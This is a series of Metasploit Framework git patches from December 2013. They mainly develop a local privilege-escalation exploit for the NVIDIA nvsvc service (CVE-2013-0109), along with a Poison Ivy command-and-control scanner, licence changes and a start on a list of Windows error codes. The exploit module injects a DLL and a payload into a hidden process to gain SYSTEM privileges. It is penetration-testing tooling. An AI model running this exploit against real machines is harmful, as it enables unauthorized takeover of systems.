zq4^XaIOcl6cRaJim#kigxt$@(%yoZi9$N02uoEHnY#yGpO9~DxfuQ2Z>v_!qtm2e>Rdtfq!?xbl@Z1hQD^;{Iqs7kki#LEwC_KuaMsx=9Wif$y-?7M(VD?y|4Zv+39`j(FLLOs}J zLrXKgP$-&E>hMBg?B=nh`=O}nGw$y(Jxb|l@0o6E?<)kUOS^c3`pqe&YiR3nrDMEN z4~1hkT(_1kfEx65=>{sPe}hq7DLqUjS4+R5>~84;%8r$G@d5ThDNk8$=@`lyN*7Qz zymSL)cS{fZfQg+~7}eR*uY6Dd{mbFRPd?~wK<|uIjOzbOCmw{L0Ql!7QkpbVdP`a& z{?)?3ktLjA=y5B6i{mt$z$I`)xFl`?SIQmZD!59nnycgLxhvc??gkgh$MSJJ$7}ib z_;S9IujT9cEBrP7S3XQVMm<42S)Hz)sm@T(RnJ#vsn4ma)phE6^%ZrBc8T_?_B$=n zmg*XG*L2_OUe?FxdA*>|&(&|#pV5DFLvLe$quyvW zzGW;jt~2g29yXpc)*1Jh9Kr?g#7#jjTE!{iTye3uS}YYm6h9Tuign@@@jLM+v9n|b zPozlM@a8?t{mcW+>E;9GBj!5uRdb-_yrss{VtEAb&oN9gy!{L=o7>L)qPeLZrBBi4 z=nM4Q_2v2mL#An-X`yMcDaW+jw8FH~R3ID`>V!4{iJ@Y)=qCk8eWfI6jWplVYGD!> zhW?Y(lN-lP;XVT2J?4Jndhur7#!u%L@bB_B_&#cldK`Gip?**OiTb!Y|2(+pXZ0iX zGqqdYQ`1+Y){N3j)TC?P&@9!g(5%&L)9loIq&cCf&|K17)!f!JX@1qjX|>v6+Sjz> zwXbUzX|uJ3+7fMHF(7dW(LDeg^n@tA3CE zkp2gKoBoAfA3rERentGw_^;z1#On>BVX$F~;fmo0gVs0`T)y9U+Sp+H#(3L!*Vt?v zZAvjU36F%nqF&4qSBe|Oo#H|9pW-)Sv)D=M4Z)Wn4VP>XY$ei%(p9NVQkq{e$C~?_ z&E}!zWb-8REb|-Y9CML*jd`2-BlAIXt@*k+ztK$0j3vO*%@SsbwhXXnEhft#%P`AG z%Q(wKOS&b)@}^~xWtpYGveL57f-PGuJ1rks4qA>{PQfhJTIwxVEjKN-`*N@{lBWLCYbIIHoZakO9&Eztv(}5%qQ`q zV1_60)A%|3Jbn?M%fHR9;@{yn^JV;D{v`hef0=*8`>3PTiRvQtR`ntEF<2A-Qr}lU zRp)zaVl@LaHq8u8hGwy5yf#m}TDxEShjx%IO*c#TmabU0MfZvBgsw_=S@)|hT5s0R z)i2P$t3RMWtbeBO9A6ZFGk%ky*09X@nen<&1;OexZ8O!FE}5>GzBN5Ev4T?QCiD_C z!b;(!@K0ed>7hoODl`pKso3cA3wZYs}x7pPFB`bhpG>UbTppOv`3)EtAeL z^qZ08g1B<-8;;>e@X4C7nibj)wQF?ib?@rDAiR3QIv%Ybrw@vch>tV8X?WML&v44n zW>6Ws!}67kgNUtwBh`q1=~=|83?rrE+9 zLY7b<6bqjU{}z4{T7)OUb0JjhCu&5am?-{391XkP6!DOFOnfXp6IsbyQb|ElB&FP|UC593Gj zDKLN2VgBaxOZesdN`4)z)?NGo{t$m0_PLAvP5x*8H{L^?uYRJA)(qB6gUKp@<=9or zX>HnXv?Fzwbbk6ky;{FpzaV}`{Jwa1ypQ3oq1E7Fd7c2>)M)zA^bn%JM|edD z75WQW!6Xb4l7vx$O_(f9&lfU;MM26 zTAc$s-d^=~%|6Yinkr3$rl+>Qc91qnn?F*U3enyIZ}UX=yAJ6U5K#X5AbmG|s6I*` z3vZ~_8}y=nkbbCsy#BJjHNFjUqS|CO)kB0gn(mvH2^%3FB#6_cOzCCIZp$G$=Q|h% zP9=<)8_K=LP2+yyJYgHI;iGj1-9f`4!%@RYLj`1*>U=|;p&s_UYla(!Gt$fEan$99 z7$zH-KV-cdx*v2y<8l0%_zUrNBQ_p{bbQ8GX{?4s^uYLvNoNvG38o>YBvZ1<3OnQk z(=O9qaQq?DQB!xJw~!zV6Osk1kRsTH?ZQ{W4dIs1C^SJDZxLFB$AV}UhlojHGGwwE yiK%4dyUE4eY;}}I(j;r%)Rb#jt(gw$3c~~fvvUQoRejF=%(ZeS;`*X1ivI%sOU8%* diff --git a/external/source/exploits/cve-2013-0109/nvidia_nvsvc/nvidia_nvsvc.cpp b/external/source/exploits/cve-2013-0109/nvidia_nvsvc/nvidia_nvsvc.cpp index 167834047c..68fd9dd039 100755 --- a/external/source/exploits/cve-2013-0109/nvidia_nvsvc/nvidia_nvsvc.cpp +++ b/external/source/exploits/cve-2013-0109/nvidia_nvsvc/nvidia_nvsvc.cpp @@ -296,7 +296,7 @@ BYTE *BuildMalicious_OverwriteStack() */ VOID elevate_nvidia_nvsvc(LPVOID payload) { - SIZE_T payloadLen = strlen(payload) + 1; + SIZE_T payloadLen = strlen((char*)payload) + 1; DWORD dwReturnCode = 1, dwBytesInOut = 0; HANDLE hPipe = NULL; From e22b4ba88c339b5eee6cf9c4a0045d16cfb27ec8 Mon Sep 17 00:00:00 2001 From: OJ Date: Sun, 8 Dec 2013 21:20:36 +1000 Subject: [PATCH 044/205] Add make script for nvidia nvsvc --- .../source/exploits/cve-2013-0109/make.msbuild | 18 ++++++++++++++++++ external/source/exploits/make.bat | 7 +++++++ 2 files changed, 25 insertions(+) create mode 100755 external/source/exploits/cve-2013-0109/make.msbuild diff --git a/external/source/exploits/cve-2013-0109/make.msbuild b/external/source/exploits/cve-2013-0109/make.msbuild new file mode 100755 index 0000000000..820c6d9b39 --- /dev/null +++ b/external/source/exploits/cve-2013-0109/make.msbuild @@ -0,0 +1,18 @@ + + + + .\nvidia_nvsvc.sln + + + + + + + + + + + + + + diff --git a/external/source/exploits/make.bat b/external/source/exploits/make.bat index 808969ad80..6981f1f155 100755 --- a/external/source/exploits/make.bat +++ b/external/source/exploits/make.bat @@ -26,6 +26,13 @@ PUSHD CVE-2010-0232 msbuild.exe make.msbuild /target:%PLAT% POPD +IF "%ERRORLEVEL%"=="0" ( + ECHO "Building CVE-2013-0109 (nvidia_nvsvc)" + PUSHD CVE-2013-0109 + msbuild.exe make.msbuild /target:%PLAT% + POPD +) + IF "%ERRORLEVEL%"=="0" ( ECHO "Building CVE-2013-3660 (ppr_flatten_rec)" PUSHD CVE-2013-3660 From 41c538856a5bbcdb831f374437377bdb920bfc87 Mon Sep 17 00:00:00 2001 From: OJ Date: Mon, 9 Dec 2013 04:54:25 +1000 Subject: [PATCH 045/205] Re-add RDI mixin changes --- .../exploits/windows/local/nvidia_nvsvc.rb | 73 ++++++------------- 1 file changed, 23 insertions(+), 50 deletions(-) diff --git a/modules/exploits/windows/local/nvidia_nvsvc.rb b/modules/exploits/windows/local/nvidia_nvsvc.rb index e65fb153f2..1a1328ff2d 100644 --- a/modules/exploits/windows/local/nvidia_nvsvc.rb +++ b/modules/exploits/windows/local/nvidia_nvsvc.rb @@ -120,12 +120,6 @@ class Metasploit3 < Msf::Exploit::Local end end - def create_proc - windir = expand_path("%windir%") - cmd = "#{windir}\\SysWOW64\\notepad.exe" - return session.sys.process.execute(cmd, nil, {'Hidden' => true }).pid - end - def is_running? begin status = service_status('nvsvc') @@ -134,60 +128,39 @@ class Metasploit3 < Msf::Exploit::Local print_error("Unable to retrieve service status") return false end - end def exploit - unless is_running? - print_error("Service not running - attempting to start") - res = service_start('nvsvc') - case res - when 0 - print_good("Service started") - when 1 - print_status("Service already started") - else - fail_with(Exploit::Failure::Unknown, "Unable to start service") - end - else - print_good("Service is running") + if is_system? + fail_with(Exploit::Failure::None, 'Session is already elevated') end - dll = '' - offset = nil - file = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2013-0109", "exploit.dll") - File.open( file,"rb" ) { |f| dll += f.read(f.stat.size) } - - pay = payload.encoded - - bo = dll.index('PAYLOAD:') - raise RuntimeError, "Invalid Win32 PE DLL template: missing \"PAYLOAD:\" tag" if not bo - dll[bo, pay.length] = [pay].pack("a*") - - pe = Rex::PeParsey::Pe.new( Rex::ImageSource::Memory.new( dll ) ) - - pe.exports.entries.each do |entry| - if( entry.name =~ /^\S*ReflectiveLoader\S*/ ) - offset = pe.rva_to_file_offset( entry.rva ) - break - end + unless check == Exploit::CheckCode::Vulnerable + fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system.") end - print_error("No offset found") unless offset + print_status("Launching notepad to host the exploit...") + process = client.sys.process.execute("notepad.exe", nil, {'Hidden' => true}) + host_process = client.sys.process.open(process.pid, PROCESS_ALL_ACCESS) + print_good("Process #{process.pid} launched.") - new_pid = create_proc + print_status("Reflectively injecting the exploit DLL into #{process.pid}...") + library_path = ::File.join(Msf::Config.data_directory, "exploits", + "CVE-2013-0109", "nvidia_nvsvc.x86.dll") + library_path = ::File.expand_path(library_path) - if not new_pid - fail_with(Exploit::Failure::Unknown, "Failed to create a new process") - end + print_status("Injecting exploit into #{process.pid} ...") + exploit_mem, offset = inject_dll_into_process(host_process, library_path) - vprint_status("Injecting payload into memory") - host_process = session.sys.process.open(new_pid.to_i, PROCESS_ALL_ACCESS) - mem = host_process.memory.allocate(dll.length + (dll.length % 1024)) - host_process.memory.protect(mem) - host_process.memory.write(mem, dll) - print_status("Executing exploit...") - host_process.thread.create(mem+offset) + print_status("Exploit injected. Injecting payload into #{process.pid}...") + payload_mem = inject_into_process(host_process, payload.encoded) + + # invoke the exploit, passing in the address of the payload that + # we want invoked on successful exploitation. + print_status("Payload injected. Executing exploit...") + host_process.thread.create(exploit_mem + offset, payload_mem) + + print_good("Exploit finished, wait for (hopefully privileged) payload execution to complete.") end end From cff7008500071a539daf494f7f6e49d80e8141bf Mon Sep 17 00:00:00 2001 From: OJ Date: Tue, 10 Dec 2013 20:49:10 +1000 Subject: [PATCH 046/205] Fix final issues with merge Hopefully this will be the last of the changes. --- modules/exploits/windows/local/nvidia_nvsvc.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/windows/local/nvidia_nvsvc.rb b/modules/exploits/windows/local/nvidia_nvsvc.rb index 1a1328ff2d..e90dcdab60 100644 --- a/modules/exploits/windows/local/nvidia_nvsvc.rb +++ b/modules/exploits/windows/local/nvidia_nvsvc.rb @@ -6,20 +6,20 @@ ## require 'msf/core' -require 'msf/core/reflective_dll_injection' require 'rex' require 'msf/core/post/common' require 'msf/core/post/windows/priv' require 'msf/core/post/windows/process' +require 'msf/core/post/windows/reflective_dll_injection' require 'msf/core/post/windows/services' class Metasploit3 < Msf::Exploit::Local Rank = AverageRanking - include Msf::ReflectiveDLLInjection include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Post::Windows::Process + include Msf::Post::Windows::ReflectiveDLLInjection include Msf::Post::Windows::Services def initialize(info={}) From f2e21470653f7b2886a1b6759f305c990bb28773 Mon Sep 17 00:00:00 2001 From: OJ Date: Wed, 11 Dec 2013 07:43:34 +1000 Subject: [PATCH 047/205] Change unless with else to if with else --- modules/exploits/windows/local/nvidia_nvsvc.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/exploits/windows/local/nvidia_nvsvc.rb b/modules/exploits/windows/local/nvidia_nvsvc.rb index e90dcdab60..2c5e547470 100644 --- a/modules/exploits/windows/local/nvidia_nvsvc.rb +++ b/modules/exploits/windows/local/nvidia_nvsvc.rb @@ -84,10 +84,10 @@ class Metasploit3 < Msf::Exploit::Local vprint_good("Found service '#{svc['Name']}'") begin - unless is_running? - print_error("Service is not running!") - else + if is_running? print_good("Service is running") + else + print_error("Service is not running!") end rescue RuntimeError => e print_error("Unable to retrieve service status") From ca1c887e68a7f5b96044b1bd29e2658bdeaa2404 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Sun, 15 Dec 2013 00:30:38 +0000 Subject: [PATCH 048/205] Add missing ] --- .../meterpreter/extensions/stdapi/railgun/def/def_advapi32.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_advapi32.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_advapi32.rb index 001daad768..95177c31cd 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_advapi32.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_advapi32.rb @@ -29,7 +29,7 @@ class Def_advapi32 dll.add_function('QueryServiceStatus', 'DWORD', [ ['LPVOID', 'hService', 'in'], - ['BLOB', 'lpServiceStatus', 'out']) + ['PBLOB', 'lpServiceStatus', 'out']]) dll.add_function('CredEnumerateA', 'BOOL', [ ['PCHAR', 'Filter', 'in'], From 8203274256edbb1634a978756f80e7dc4c46ffa4 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Sun, 15 Dec 2013 00:42:52 +0000 Subject: [PATCH 049/205] Small fixes Remove " from service command if it is quoted. Spawn SYSWOW64 notepad. --- modules/exploits/windows/local/nvidia_nvsvc.rb | 15 ++++++++++----- 1 file changed, 10 insertions(+), 5 deletions(-) diff --git a/modules/exploits/windows/local/nvidia_nvsvc.rb b/modules/exploits/windows/local/nvidia_nvsvc.rb index 2c5e547470..58f4d249d8 100644 --- a/modules/exploits/windows/local/nvidia_nvsvc.rb +++ b/modules/exploits/windows/local/nvidia_nvsvc.rb @@ -50,7 +50,7 @@ class Metasploit3 < Msf::Exploit::Local }, 'Targets' => [ - [ 'Automatic', { } ] + [ 'Windows x64', { } ] ], 'Payload' => { @@ -97,7 +97,7 @@ class Metasploit3 < Msf::Exploit::Local # Unable to check the file in System32 (Need to add a DisableWOW64FSRedirection option to meterp!) return Exploit::CheckCode::Detected else - path = svc['Command'].strip + path = svc['Command'].gsub('"','').strip end begin @@ -140,13 +140,18 @@ class Metasploit3 < Msf::Exploit::Local end print_status("Launching notepad to host the exploit...") - process = client.sys.process.execute("notepad.exe", nil, {'Hidden' => true}) + + windir = expand_path("%windir%") + cmd = "#{windir}\\SysWOW64\\notepad.exe" + process = client.sys.process.execute(cmd, nil, {'Hidden' => true}) host_process = client.sys.process.open(process.pid, PROCESS_ALL_ACCESS) print_good("Process #{process.pid} launched.") print_status("Reflectively injecting the exploit DLL into #{process.pid}...") - library_path = ::File.join(Msf::Config.data_directory, "exploits", - "CVE-2013-0109", "nvidia_nvsvc.x86.dll") + library_path = ::File.join(Msf::Config.data_directory, + "exploits", + "CVE-2013-0109", + "nvidia_nvsvc.x86.dll") library_path = ::File.expand_path(library_path) print_status("Injecting exploit into #{process.pid} ...") From 2dc4faad721c2b5d364982b45424e20dca484291 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Sun, 15 Dec 2013 00:44:07 +0000 Subject: [PATCH 050/205] Resplat license --- modules/exploits/windows/local/nvidia_nvsvc.rb | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/modules/exploits/windows/local/nvidia_nvsvc.rb b/modules/exploits/windows/local/nvidia_nvsvc.rb index 58f4d249d8..98cc27a6d4 100644 --- a/modules/exploits/windows/local/nvidia_nvsvc.rb +++ b/modules/exploits/windows/local/nvidia_nvsvc.rb @@ -1,8 +1,6 @@ ## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# web site for more information on licensing and terms of use. -# http://metasploit.com/ +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' From 3dec7f61a5a515059d7d2f4fdfe313304731b270 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Sun, 15 Dec 2013 01:05:19 +0000 Subject: [PATCH 051/205] Check in sysnative if wow64 --- modules/exploits/windows/local/nvidia_nvsvc.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/windows/local/nvidia_nvsvc.rb b/modules/exploits/windows/local/nvidia_nvsvc.rb index 98cc27a6d4..3251dd06a3 100644 --- a/modules/exploits/windows/local/nvidia_nvsvc.rb +++ b/modules/exploits/windows/local/nvidia_nvsvc.rb @@ -92,8 +92,8 @@ class Metasploit3 < Msf::Exploit::Local end if sysinfo['Architecture'] =~ /WOW64/i - # Unable to check the file in System32 (Need to add a DisableWOW64FSRedirection option to meterp!) - return Exploit::CheckCode::Detected + path = svc['Command'].gsub('"','').strip + path.gsub!("system32","sysnative") else path = svc['Command'].gsub('"','').strip end From 226cd241bf42d9197cf1101e4149243387b8744e Mon Sep 17 00:00:00 2001 From: SeawolfRN Date: Sun, 15 Dec 2013 14:34:50 +0000 Subject: [PATCH 052/205] Added Poison Ivy Command and Control Scanner\n Auxiliary module to scan for Poison Ivy C&C on ports 80,8080,443 and 3460 --- .../scanner/misc/poisonivy_control_scanner.rb | 95 +++++++++++++++++++ 1 file changed, 95 insertions(+) create mode 100644 modules/auxiliary/scanner/misc/poisonivy_control_scanner.rb diff --git a/modules/auxiliary/scanner/misc/poisonivy_control_scanner.rb b/modules/auxiliary/scanner/misc/poisonivy_control_scanner.rb new file mode 100644 index 0000000000..276de4e321 --- /dev/null +++ b/modules/auxiliary/scanner/misc/poisonivy_control_scanner.rb @@ -0,0 +1,95 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::Tcp + + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + + + def initialize + super( + 'Name' => 'Poison Ivy C&C Scanner', + 'Description' => 'Enumerate Poison Ivy C&C on ports 3460,80,8080 and 443. Adaptation of iTrust Python script. +www.malware.lu/Pro/RAP002_APT1_Technical_backstage.1.0.pdf', + 'Author' => [ 'SeawolfRN'], + 'License' => MSF_LICENSE + ) + + register_options( + [ + OptInt.new('TIMEOUT', [true, "The socket connect timeout in milliseconds", 1000]), + OptInt.new('CONCURRENCY', [true, "The number of concurrent ports to check per host", 10]), + ], self.class) + + deregister_options('RPORT') + + end + + + def run_host(ip) + + timeout = datastore['TIMEOUT'].to_i + + ports = Rex::Socket.portspec_crack("3460,80,443,8080") + + while(ports.length > 0) + t = [] + r = [] + begin + 1.upto(datastore['CONCURRENCY']) do + this_port = ports.shift + break if not this_port + t << framework.threads.spawn("Module(#{self.refname})-#{ip}:#{this_port}", false, this_port) do |port| + begin + s = connect(false, + { + 'RPORT' => port, + 'RHOST' => ip, + 'ConnectTimeout' => (timeout / 1000.0) + } + ) + r << [ip,port,"open"] + s.send("\x00"*0x100,0) #Send 0x100 zeros, wait for answer + data=s.recv(0x100) + if data.length==0x100 + data=s.recv(0x4) + if data=="\xD0\x15\x00\x00" #Signature for PIVY C&C + print_status("#{ip}:#{port} - C&C Server Found") + end + end + rescue ::Rex::ConnectionRefused + vprint_status("#{ip}:#{port} - TCP closed") + r << [ip,port,"closed"] + rescue ::Rex::ConnectionError, ::IOError, ::Timeout::Error + rescue ::Rex::Post::Meterpreter::RequestError + rescue ::Interrupt + raise $! + rescue ::Exception => e + print_error("#{ip}:#{port} exception #{e.class} #{e} #{e.backtrace}") + ensure + disconnect(s) rescue nil + end + end + end + t.each {|x| x.join } + + rescue ::Timeout::Error + ensure + t.each {|x| x.kill rescue nil } + end + + r.each do |res| + report_service(:host => res[0], :port => res[1], :state => res[2]) + end + end + end + +end From 59003a984289fbcf03005441985c81d36a67d318 Mon Sep 17 00:00:00 2001 From: SeawolfRN Date: Sun, 15 Dec 2013 22:02:14 +0000 Subject: [PATCH 053/205] Updated Poison Ivy Scanner --- .../scanner/misc/poisonivy_control_scanner.rb | 20 ++++++++++--------- 1 file changed, 11 insertions(+), 9 deletions(-) diff --git a/modules/auxiliary/scanner/misc/poisonivy_control_scanner.rb b/modules/auxiliary/scanner/misc/poisonivy_control_scanner.rb index 276de4e321..b8cc83f5ae 100644 --- a/modules/auxiliary/scanner/misc/poisonivy_control_scanner.rb +++ b/modules/auxiliary/scanner/misc/poisonivy_control_scanner.rb @@ -17,15 +17,18 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Poison Ivy C&C Scanner', - 'Description' => 'Enumerate Poison Ivy C&C on ports 3460,80,8080 and 443. Adaptation of iTrust Python script. -www.malware.lu/Pro/RAP002_APT1_Technical_backstage.1.0.pdf', + 'Description' => 'Enumerate Poison Ivy C&C on ports 3460,80,8080 and 443. Adaptation of iTrust Python script.', + 'References' => + [ + ['URL', 'www.malware.lu/Pro/RAP002_APT1_Technical_backstage.1.0.pdf'], + ], 'Author' => [ 'SeawolfRN'], 'License' => MSF_LICENSE ) register_options( [ - OptInt.new('TIMEOUT', [true, "The socket connect timeout in milliseconds", 1000]), + OptString.new('PORTS', [true, "Ports to Check","80,8080,443,3460"]) OptInt.new('CONCURRENCY', [true, "The number of concurrent ports to check per host", 10]), ], self.class) @@ -38,7 +41,7 @@ www.malware.lu/Pro/RAP002_APT1_Technical_backstage.1.0.pdf', timeout = datastore['TIMEOUT'].to_i - ports = Rex::Socket.portspec_crack("3460,80,443,8080") + ports = Rex::Socket.portspec_crack(datastore['PORTS']) while(ports.length > 0) t = [] @@ -56,24 +59,23 @@ www.malware.lu/Pro/RAP002_APT1_Technical_backstage.1.0.pdf', 'ConnectTimeout' => (timeout / 1000.0) } ) - r << [ip,port,"open"] + r << [ip,port,"open",'Unknown'] s.send("\x00"*0x100,0) #Send 0x100 zeros, wait for answer data=s.recv(0x100) if data.length==0x100 data=s.recv(0x4) if data=="\xD0\x15\x00\x00" #Signature for PIVY C&C print_status("#{ip}:#{port} - C&C Server Found") + r << [ip,port,"open",'Poison Ivy C&C'] end end rescue ::Rex::ConnectionRefused vprint_status("#{ip}:#{port} - TCP closed") - r << [ip,port,"closed"] + r << [ip,port,"closed",''] rescue ::Rex::ConnectionError, ::IOError, ::Timeout::Error rescue ::Rex::Post::Meterpreter::RequestError rescue ::Interrupt raise $! - rescue ::Exception => e - print_error("#{ip}:#{port} exception #{e.class} #{e} #{e.backtrace}") ensure disconnect(s) rescue nil end @@ -87,7 +89,7 @@ www.malware.lu/Pro/RAP002_APT1_Technical_backstage.1.0.pdf', end r.each do |res| - report_service(:host => res[0], :port => res[1], :state => res[2]) + report_service(:host => res[0], :port => res[1], :state => res[2], :name=> res[3]) end end end From 79022c2e297aa0a52b8172711bf8902d2f2bd091 Mon Sep 17 00:00:00 2001 From: SeawolfRN Date: Mon, 16 Dec 2013 11:33:08 +0000 Subject: [PATCH 054/205] Probably should have checked it worked... --- modules/auxiliary/scanner/misc/poisonivy_control_scanner.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/misc/poisonivy_control_scanner.rb b/modules/auxiliary/scanner/misc/poisonivy_control_scanner.rb index b8cc83f5ae..d9f44f7542 100644 --- a/modules/auxiliary/scanner/misc/poisonivy_control_scanner.rb +++ b/modules/auxiliary/scanner/misc/poisonivy_control_scanner.rb @@ -28,7 +28,7 @@ class Metasploit3 < Msf::Auxiliary register_options( [ - OptString.new('PORTS', [true, "Ports to Check","80,8080,443,3460"]) + OptString.new('PORTS', [true, "Ports to Check","80,8080,443,3460"]), OptInt.new('CONCURRENCY', [true, "The number of concurrent ports to check per host", 10]), ], self.class) From 132ea769412ce09e24c3636730fb562f9f72a5ec Mon Sep 17 00:00:00 2001 From: Meatballs Date: Mon, 16 Dec 2013 14:01:32 +0000 Subject: [PATCH 055/205] Remove meterpreter LICENSE references --- LICENSE | 87 ++------------------------------------------------------- 1 file changed, 2 insertions(+), 85 deletions(-) diff --git a/LICENSE b/LICENSE index acb2f21eca..8079572def 100644 --- a/LICENSE +++ b/LICENSE @@ -41,93 +41,10 @@ Copyright: 2004-2005 vlad902 2007 H D Moore License: GPL-2 and Artistic -Files: external/source/meterpreter/ReflectiveDLLInjection/* -Copyright: 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com) +Files: external/source/ReflectiveDLLInjection/* +Copyright: 2011, Stephen Fewer of Harmony Security (www.harmonysecurity.com) License: BSD-3-clause -Files: external/source/meterpreter/source/common/queue.h -Copyright: 1991, 1993 The Regents of the University of California -License: BSD-3-clause - -Files: external/source/meterpreter/source/common/zlib/* external/source/meterpreter/source/server/zlib/* -Copyright: 1995-1996 Jean-loup Gailly and Mark Adler -License: Zlib - -Files: external/source/meterpreter/source/bionic/libc/* -Copyright: 2005-2008, The Android Open Source Project - 2004 by Internet Systems Consortium, Inc. ("ISC") - 1995,1996,1999 by Internet Software Consortium - 1995 by International Business Machines, Inc. - 1997,1998,1999,2004 The NetBSD Foundation, Inc. - 1993 Christopher G. Demetriou - 1983,1985,1989,1993 The Regents of the University of California - 2000 Ben Harris - 1995,1996,1997,1998 WIDE Project - 2003 Networks Associates Technology, Inc. - 1993 by Digital Equipment Corporation - 1997 Mark Brinicombe - 1993 Martin Birgmeier - 1993 by Sun Microsystems, Inc. - 1997, 2005 Todd C. Miller - 1995, 1996 Carnegie-Mellon University - 2003 Networks Associates Technology, Inc. -License: BSD-3-clause and BSD-4-clause - -Files: external/source/meterpreter/source/bionic/libdl/* -Copyright: 2007 The Android Open Source Project -License: BSD-3-clause - -Files: external/source/meterpreter/source/bionic/libm/* -Copyright: 2003, Steven G. Kargl - 2003 Mike Barcroft - 2002-2005 David Schultz - 2004 Stefan Farfeleder - 2003 Dag-Erling Coïdan Smørgrav - 1996 The NetBSD Foundation, Inc. - 1985,1988,1991,1992,1993 The Regents of the University of California - 1993,94 Winning Strategies, Inc. - 1993, 2004 by Sun Microsystems, Inc. -License: BSD-2-clause and BSD-3-clause and BSD-4-clause - -Files: external/source/meterpreter/source/extensions/espia/screen.c -Copyright: 1994-2008, Mark Hammond -License: BSD-2-clause - -Files: external/source/meterpreter/source/extensions/priv/server/timestomp.c -Copyright: 2005 Vincent Liu -License: GPL-2 - -Files: external/source/meterpreter/source/extensions/stdapi/server/webcam/bmp2jpeg.c external/source/meterpreter/source/screenshot/bmp2jpeg.c -Copyright: 1994-2008, Mark Hammond -License: BSD-2-clause - -Files: external/source/meterpreter/source/extensions/stdapi/server/railgun/railgun.c -Copyright: 2010, patrickHVE@googlemail.com -License: BSD-2-clause - -Files: external/source/meterpreter/source/pssdk/* -Copyright: microOLAP -License: N/A -Comment: HD Moore holds a single-seat developer license for the Packet Sniffer - SDK library embedded into the Meterpreter Sniffer extension. This - source code is not distributed with Metasploit Framework. - -Files: external/source/meterpreter/source/openssl/* -Copyright: 1998-2002 The OpenSSL Project -License: OpenSSL and SSLeay - -Files: external/source/meterpreter/source/server/posix/sfsyscall.h -Copyright: 2003 Philippe Biondi -License: LGPL - -Files: external/source/meterpreter/source/jpeg-8/* -Copyright: 1991-2010, Thomas G. Lane, Guido Vollbeding -License: BSD-3-clause - -Files: external/source/meterpreter/source/libpcap/* -Copyright: 1990, 1991, 1992, 1993, 1994, 1995, 1996, 1997 The Regents of the University of California. -License: BSD-4-clause - Files: external/source/metsvc/* Copyright: 2007, Determina Inc. License: BSD-3-clause From bf561fef95a6599687f98090a3eda16f089c8ee6 Mon Sep 17 00:00:00 2001 From: SeawolfRN Date: Mon, 16 Dec 2013 16:38:49 +0000 Subject: [PATCH 056/205] Corrected Extraneous Whitespace\Newlines --- .../auxiliary/scanner/misc/poisonivy_control_scanner.rb | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) diff --git a/modules/auxiliary/scanner/misc/poisonivy_control_scanner.rb b/modules/auxiliary/scanner/misc/poisonivy_control_scanner.rb index d9f44f7542..f7fa709c4c 100644 --- a/modules/auxiliary/scanner/misc/poisonivy_control_scanner.rb +++ b/modules/auxiliary/scanner/misc/poisonivy_control_scanner.rb @@ -9,20 +9,18 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp - include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner - def initialize super( 'Name' => 'Poison Ivy C&C Scanner', 'Description' => 'Enumerate Poison Ivy C&C on ports 3460,80,8080 and 443. Adaptation of iTrust Python script.', - 'References' => + 'References' => [ - ['URL', 'www.malware.lu/Pro/RAP002_APT1_Technical_backstage.1.0.pdf'], + ['URL', 'www.malware.lu/Pro/RAP002_APT1_Technical_backstage.1.0.pdf'], ], - 'Author' => [ 'SeawolfRN'], + 'Author' => ['SeawolfRN'], 'License' => MSF_LICENSE ) From 75c87faaf8e94a410f921b8d956954d11ce24a15 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Mon, 16 Dec 2013 18:50:18 +0000 Subject: [PATCH 057/205] Add Windows Error Codes to Windows Post Mixin --- lib/msf/core/post/windows.rb | 2529 ++++++++++++++++++++++++++++++++++ 1 file changed, 2529 insertions(+) diff --git a/lib/msf/core/post/windows.rb b/lib/msf/core/post/windows.rb index a504e65670..6b9c98c81f 100644 --- a/lib/msf/core/post/windows.rb +++ b/lib/msf/core/post/windows.rb @@ -12,4 +12,2533 @@ module Msf::Post::Windows require 'msf/core/post/windows/services' require 'msf/core/post/windows/shadowcopy' require 'msf/core/post/windows/user_profiles' + + ERROR_SUCCESS = 0x0000 + ERROR_INVALID_FUNCTION = 0x0001 + ERROR_FILE_NOT_FOUND = 0x0002 + ERROR_PATH_NOT_FOUND = 0x0003 + ERROR_TOO_MANY_OPEN_FILES = 0x0004 + ERROR_ACCESS_DENIED = 0x0005 + ERROR_INVALID_HANDLE = 0x0006 + ERROR_ARENA_TRASHED = 0x0007 + ERROR_NOT_ENOUGH_MEMORY = 0x0008 + ERROR_INVALID_BLOCK = 0x0009 + ERROR_BAD_ENVIRONMENT = 0x000A + ERROR_BAD_FORMAT = 0x000B + ERROR_INVALID_ACCESS = 0x000C + ERROR_INVALID_DATA = 0x000D + ERROR_OUTOFMEMORY = 0x000E + ERROR_INVALID_DRIVE = 0x000F + ERROR_CURRENT_DIRECTORY = 0x0010 + 